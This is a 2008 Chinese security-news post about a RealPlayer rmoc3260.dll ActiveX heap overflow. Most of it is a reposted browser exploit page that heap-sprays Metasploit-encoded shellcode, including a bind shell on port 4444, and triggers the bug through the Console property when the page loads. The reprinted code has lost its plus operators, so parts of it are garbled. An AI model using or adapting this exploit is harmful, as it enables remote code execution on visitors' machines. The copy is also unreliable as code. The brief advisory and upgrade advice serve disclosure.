RealPlayer的漏洞问题越来越严重，milworm在昨天再次发布了一个Real Player 控件溢出漏洞。在环境 Windows XP SP2(fully patched) English, IE6测试成功运行calc。

该漏洞存在于rmoc3260.dll，并且只有 version 6.0.10.45可以被成功执行漏洞攻击。

在最新版本以及旧版本没有办法成功执行该漏洞。该DLL版本对应的REAL版本号为：6.0.14.748。请使用6.0.14.748版本的用户尽快安装新版本。

发布日期:2008-4-2

最后更新日期:2008-4-2 12:37（GMT）

real又报新洞。。。漏洞组件rmoc3260.dll版本6.0.10.45

程序代码

<!--

Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)

written by e.b.

Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45

Thanks to h.d.m. and the Metasploit crew

-->

<html>

<head>

<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>

<script language="JavaScript" defer>

function Check() {

// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com

var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"

"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"

"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"

"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"

"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"

"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"

"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"

"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"

"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"

"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"

"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"

"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"

"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"

"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"

"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"

"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"

"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"

"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"

"%u314e%u7475%u7038%u7765%u4370");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com

var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"

"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"

"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"

"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"

"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"

"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"

"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"

"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"

"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"

"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"

"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"

"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"

"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"

"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"

"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"

"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"

"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"

"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"

"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"

"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"

"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"

"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"

"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"

"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"

"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"

"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"

"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"

"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"

"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"

"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"

"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"

"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"

"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"

"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"

"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"

"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"

"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"

"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"

"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"

"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"

"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"

"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"

"%u684f%u3956%u386f%u4350");

var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize shellcode1.length;

while (bigblock.length < slackspace) bigblock = bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock.substring(0,bigblock.length - slackspace);

while (block.length slackspace < 0x40000) block = block block fillblock;

var memory = new Array();

for (i = 0; i < 400; i ){ memory[i] = block shellcode1 }

var buf = '';

while (buf.length < 32) buf = buf unescape("");

var m = '';

m = obj.Console;

obj.Console = buf;

obj.Console = m;

m = obj.Console;

obj.Console = buf;

obj.Console = m;

}

</script>

</head>

<body onload="JavaScript: return Check();">

<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">

Unable to create object

</object>

</body>

</html>

【RealPlayer又曝新漏洞】相关文章：

★ Discuz论坛短消息未限制发送次数漏洞

★ Microsoft SharePoint Server跨站脚本漏洞

★ BBSXP2008存在后台注射漏洞

★ Coppermine Photo Gallery跨站脚本及SQL注入漏洞

★ 解析PNG图象格式库存在远程拒绝服务漏洞

★ Symark PowerBroker 客户端多个本地命令溢出漏洞

★ FlashGet jccatch.dll ActiveX控件多个拒绝服务漏洞

★ Learn2 STRunner ActiveX控件存在多个栈溢出漏洞

★ IBM Tivoli Storage Manager Express 堆溢出漏洞

★ eWebeditor漏洞的修补